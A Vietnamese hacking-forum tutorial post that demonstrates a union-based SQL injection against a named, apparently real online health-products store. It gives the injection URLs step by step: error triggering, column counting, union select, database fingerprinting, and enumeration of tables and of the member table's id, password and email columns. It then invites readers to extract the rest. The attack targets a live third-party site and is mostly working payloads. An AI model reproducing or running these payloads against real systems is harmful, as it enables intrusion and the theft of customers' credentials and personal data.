[TUT]Khai Thác HTML SQLi

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Khai thác sql dạng HTML
  victim lần này là:
  http://www.worldwidehealthcenter.net/articles-261.html

  Thêm dấu ‘ vào sau những con số
  http://www.worldwidehealthcenter.net/articles-261′.html

  haha lỗi rồi

  Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

  Warning: Cannot modify header information – headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

  Bắt đầu order by
  http://www.worldwidehealthcenter.net/articles-261 order by 1– -.html >>ok
  http://www.worldwidehealthcenter.net/articles-261 order by 7– -.html >> ok
  http://www.worldwidehealthcenter.net/articles-261 order by 8– -.html >> bao loi

  >>8-1=7 nhé

  bây h union select :
  http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7– -.html

  ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

  Ghét quá thay số bằng null xem 261=null

  http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7– -.html

  ui ra rồi 2 và 3 nhé

  Tìm các thông tin :version(),database(),user()
  http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7– -.html

  Tiếp theo tìm table namehttp://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()– -.html
  1 đống :
  adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers

  Tìm table chứa thông tin

  Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
  member=0x6d656d626572 (conver to hex nhé)
  get column
  http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572– -.html
  lại ra 1 đống :
  id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e

  Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé
   

Share This Page